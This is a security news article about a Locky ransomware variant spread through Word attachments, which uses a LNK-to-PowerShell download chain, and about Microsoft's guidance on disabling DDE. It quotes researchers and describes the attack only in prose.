New Locky Ransomware Takes Another Turn

A newly discovered strain of Locky ransomware has been discovered masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications like Microsoft Word and Libre Office.
Researchers at Avira Virus Lab
detected
the ransomware earlier this week. This form of Locky has the same .asasin extension as a strain PhishMe
picked up
in October. However, its crafted to manipulate users with a reportedly protected document disguised as this:
Users who double-click the image prompt a series of actions, which ultimately result in their files being encrypted under the .asasin file extension name. Multiple other files, with payment details, are written onto the disk.
Behind the image from the Word document, researchers saw a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.
The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.
Once its on the victims machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.
We are seeing a rapid evolution in the way Locky is delivered, says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. Locky stays the same, but the delivery techniques is where weve really seen the most change.
Evolution of Locky: What does it mean?
Ransomware is a
growing problem
for many organizations, and Locky is a common attack to watch.
Locky has been one of the most popular malware libraries for a long time, says John Pironti, president of IP Architects. It has been maturing, and that doesnt surprise me because it has been successful in financial gain.
Its common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.
Its misleading to call this recent finding a new strain of Locky, Griffin adds. The .asasin strain, which PhishMe also detected, is a more robust and more verbose script application delivery than other forms of Locky seen in the past. It collects basic information off the machine; nothing personally identifiable. This is the same malware arriving on a different path.
Weve seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages, Pironti says. People are more likely to open an attachment, the vector in Aviras finding, than they are to click a link.
We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments, Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files arent as suspicious as a potentially phishy link.
He notes that the .asasin extension is amusing. They want to work off fear and force people to pay, he says.
This evolution also underscores how attackers often revert to simple techniques, Griffin adds. Theyre taking advantage of the fact that phishing emails, while basic, work. Why would they choose a really complex, sophisticated, unreliable means of delivering malware? he says.
Defending against fake applications
Griffiin points out that this is a clear example of abuse of Microsofts Dynamic Data Exchange (DDE), a protocol on which Microsoft just published guidance for users.
Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.
Admins can turn off DDE by
creating and setting
registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.
Related Content:
10 Scariest Ransomware Attacks of 2017
Less Than One-Third of People Use Two-Factor Authentication
How to Make a Ransomware Payment - Fast
Ransomware Grabs Headlines but BEC May Be a Bigger Threat
Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity
agenda here
.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
New Locky Ransomware Takes Another Turn